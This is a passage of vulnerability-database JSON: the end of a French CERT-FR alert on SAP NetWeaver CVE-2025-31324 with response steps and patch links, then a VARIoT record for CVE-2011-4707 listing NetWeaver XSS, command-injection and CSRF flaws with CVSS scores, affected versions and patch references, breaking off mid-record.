le CERT-FR.*\n\u003cbr\u003e\u003c/br\u003e\nSi des fichiers malveillants ou des journaux suspects sont pr\u00e9sents : \n* signaler l\u2019\u00e9v\u00e9nement aupr\u00e8s du CERT-FR en mettant en copie vos \u00e9ventuels CSIRTs m\u00e9tier et consulter les bons r\u00e9flexes en cas d\u0027intrusion sur votre syst\u00e8me d\u0027information [5] ;\n* isoler totalement la machine concern\u00e9e du r\u00e9seau, vis-\u00e0-vis d\u0027Internet comme du r\u00e9seau interne, afin de limiter les risques de lat\u00e9ralisation ;\n* en cas d\u0027utilisation d\u0027une appliance virtuelle, r\u00e9aliser un instantan\u00e9 du syst\u00e8me de fichier et de la m\u00e9moire vive ;\n* si possible, \u00e9viter d\u0027\u00e9teindre la machine afin de conserver les traces n\u00e9cessaires aux investigations ;\n* mettre sous s\u00e9questre les journaux collect\u00e9s.\n\nLes correctifs pour le composant Visual Composer Framework 7.50 sont list\u00e9s et disponibles dans le bulletin de s\u00e9curit\u00e9 3594142 de l\u0027\u00e9diteur. \n\nDes mesures de contournements sont propos\u00e9es par l\u0027\u00e9diteur [1]. ",
"cves": [
{
"name": "CVE-2025-31324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31324"
}
],
"links": [
{
"title": "Avis CERT-FR CERTFR-2025-AVI-0350 du 25 avril 2025",
"url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0350/"
},
{
"title": "[4] Billet de blogue de Reliaquest relatif \u00e0 l\u0027exploitation de la vuln\u00e9rabilit\u00e9 CVE-2025-31324",
"url": "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
},
{
"title": "[5] Les bons r\u00e9flexes en cas d\u2019intrusion sur un syst\u00e8me d\u2019information",
"url": " https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/ "
},
{
"title": "[3] Billet de blogue Rapid7 du 28 avril relatif \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2025-31324",
"url": "https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/"
},
{
"title": "[1] Bulletin de s\u00e9curit\u00e9 SAP 3593336 version 5 du 28/04/2025 relatif aux mesures de contournement",
"url": "https://me.sap.com/notes/3593336"
},
{
"title": "[2] FAQ sur l\u0027exploitation de la vuln\u00e9rabilit\u00e9 CVE-2025-31324",
"url": " https://me.sap.com/notes/3596125"
}
],
"reference": "CERTFR-2025-ALE-005",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-28T00:00:00.000000"
},
{
"description": " Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
"revision_date": "2025-06-24T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Le 24 avril 2025, SAP a publi\u00e9 un bulletin de s\u00e9curit\u00e9 relatif \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2025-31324 qui permet l\u0027ex\u00e9cution de code arbitraire \u00e0 distance pour un utilisateur non authentifi\u00e9. Cette vuln\u00e9rabilit\u00e9 est provoqu\u00e9e par un contournement de la politique de s\u00e9curit\u00e9 qui permet de t\u00e9l\u00e9charger des fichiers arbitraires et potentiellement ex\u00e9cutables sur le serveur. Elle impacte le composant *Visual Composer development server*, non install\u00e9 par d\u00e9faut mais fr\u00e9quemment utilis\u00e9.\n\nLe CERT-FR a connaissance de plusieurs compromissions li\u00e9es \u00e0 cette vuln\u00e9rabilit\u00e9. \n\n\nL\u0027acc\u00e8s aux d\u00e9tails complets concernant cette vuln\u00e9rabilit\u00e9 ([1] [2]) n\u00e9cessite un compte utilisateur pour le support SAP. Le bulletin de s\u00e9curit\u00e9 du 8 avril 2025 a \u00e9t\u00e9 mis \u00e0 jour pour indiquer cette nouvelle vuln\u00e9rabilit\u00e9 sans faire mention de son exploitation active.",
"title": "Vuln\u00e9rabilit\u00e9 dans SAP NetWeaver",
"vendor_advisories": [
{
"published_at": "2025-04-24",
"title": "Bulletin de s\u00e9curit\u00e9 SAP april-2025",
"url": " https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2025.html "
},
{
"published_at": "2025-04-24",
"title": "Bulletin de s\u00e9curit\u00e9 SAP 3594142 version 17",
"url": "https://me.sap.com/notes/3594142"
}
]
}
VAR-201112-0297
Vulnerability from variot - Updated: 2024-07-23 22:41Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201112-0297",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 5.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.01*"
},
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastuchin, Dmitriy Evdokimov, Alexandr Polyakov and Alexey Tyurin of Digital Security Research Group (DSecRG)",
"sources": [
{
"db": "BID",
"id": "50680"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4707",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2011-4707",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4707",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201112-122",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2011-4707",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user\u0027s browser when viewed maliciously. When using transaction \\\"sa38\\\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \\\"File Name\\\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \\\"\u003cSTRING\u003e\\\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4707"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
}
],
"trust": 7.02
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "50680",
"trust": 4.6
},
{
"db": "NVD",
"id": "CVE-2011-4707",
"trust": 4.2
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122",
"trust": 2.0
},
{
"db": "CNVD",
"id": "CNVD-2011-4916",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4915",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4914",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4917",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4913",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4912",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4911",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20111117 [DSECRG-11-036] SAP NETWAVER VIRUS SCAN INTERFACE - MULTIPLE XSS",
"trust": 0.6
},
{
"db": "IVD",
"id": "3B9467EC-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3D199B1E-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3E98D306-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3A022216-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "40204C22-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "4119FC7C-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "4247BD6E-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2011-4707",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"id": "VAR-201112-0297",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
],
"trust": 6.093194613333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 5.6
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
]
},
"last_update_date": "2024-07-23T22:41:20.004000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers - 1546307",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5913"
},
{
"title": "Patch for SAP NetWeaver Feature Access Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5922"
},
{
"title": "Patch for SAP NetWeaver Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5912"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5909"
},
{
"title": "Patch for SAP NetWeaver Path Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5911"
},
{
"title": "Patch for SAP NetWeaver \u0027page\u0027 parameter cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5910"
},
{
"title": "SAP Netweaver Script Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5908"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
